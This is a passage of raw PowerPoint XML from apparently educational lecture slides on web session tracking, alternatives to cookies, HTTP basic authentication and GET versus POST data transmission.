          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using web forms with hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the form is handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the tracking information is in the HTML source and POST input rather than in the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the information is not copied when the user copies the URL </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7CFB83-C77F-42C7-B10C-163C1ED04BD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Alternatives to cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73E6635-8093-4819-BA6E-81190F45D204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HTTP protocol includes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>basic access authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>digest access authentication protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which allow access to a Web page only when the user has provided the correct username and password. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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986" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2747E4A9-4C70-45E0-A83A-497BB0465333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Alternatives to cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B749FD5-76AC-4431-A660-93EDCD05BA8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>window.name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All current web browsers can store a fairly large amount of data (2-32 MB) via JavaScript using the DOM property window.name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cookie sniffing attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different web sites opened in the same window or tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72AE639-F9F3-4BE0-97FB-11E5506FA672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Alternatives to cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D740C75-6DBF-4BAE-BE39-5FAAFD303624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1341438"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Adobe Flash Local Shared Objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a browser includes the Adobe Flash Player </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3" tooltip="Plugin"/>
              </a:rPr>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (formerly developed by Macromedia), the Local Shared Objects functionality can be used in a way very similar to cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The major drawback with this approach is the same as every platform/vendor-specific approach: it breaks the web's global accessibility and interoperability, tying up web development to a specific client's platform, excluding users who use standards-compliant web user agents and instead forcing them to use platform/vendor-specific web agents, which perpetuates vendor lock-in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Client-side persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sessionStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> variables.</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2518029-3ADB-42F0-AD37-E60FFA34E22B}"/>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Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28EBD72D-60B3-42A5-A3B9-321D46AB0288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the context of an HTTP transaction, this is a method for a web browser or other client program to provide a user name and password when making a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the user name is appended with a colon and concatenated with the password. The resulting string is encoded with the Base64 algorithm, for example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Aladdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and  password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>open sesame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Aladdin:open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> sesame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>resulting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>QWxhZGRpbjpvcGVuIHNlc2FtZQ==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pP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BAC8890-118D-4EC3-B15B-BA2159F38C5C}"/>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Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFCE890-5B97-46FC-99B1-9AA96ADD902F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Encoded string is easily decoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Security is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t> the intent of the encoding step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>the intent of the encoding is to encode non-HTTP-compatible characters that may be in the user name or password into those that are HTTP-compatible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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766083-442B-42C2-B34E-2ABC490AB7BE}"/>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r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB18A1C5-0FC0-46B7-B17D-68C3D22B69E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>All web browsers support it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>It is rarely used on publicly accessible Internet web sites but may sometimes be used by small, private systems, and in home appliances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Programmers and system administrators sometimes use basic access authentication, in a trusted network environment, to manually test web servers using Telnet or other plain-text network tools</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" alt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7165C449-0EE9-4B19-9DBA-999FB6C75A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Data transmission client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3E0AB2-9BF1-44E4-84E6-AB2B5918CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="4033838" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST Method:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Necessary if data exceeds URL length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Data is encoded in message body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FF850F5-6548-4152-A579-8482778EA555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176964" y="2373314"/>
            <a:ext cx="4033837" cy="2147887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode data in URLs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Use the GET command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Data is encoded within URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE27A6C-A11C-4AF7-A425-2704FB7DB3D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
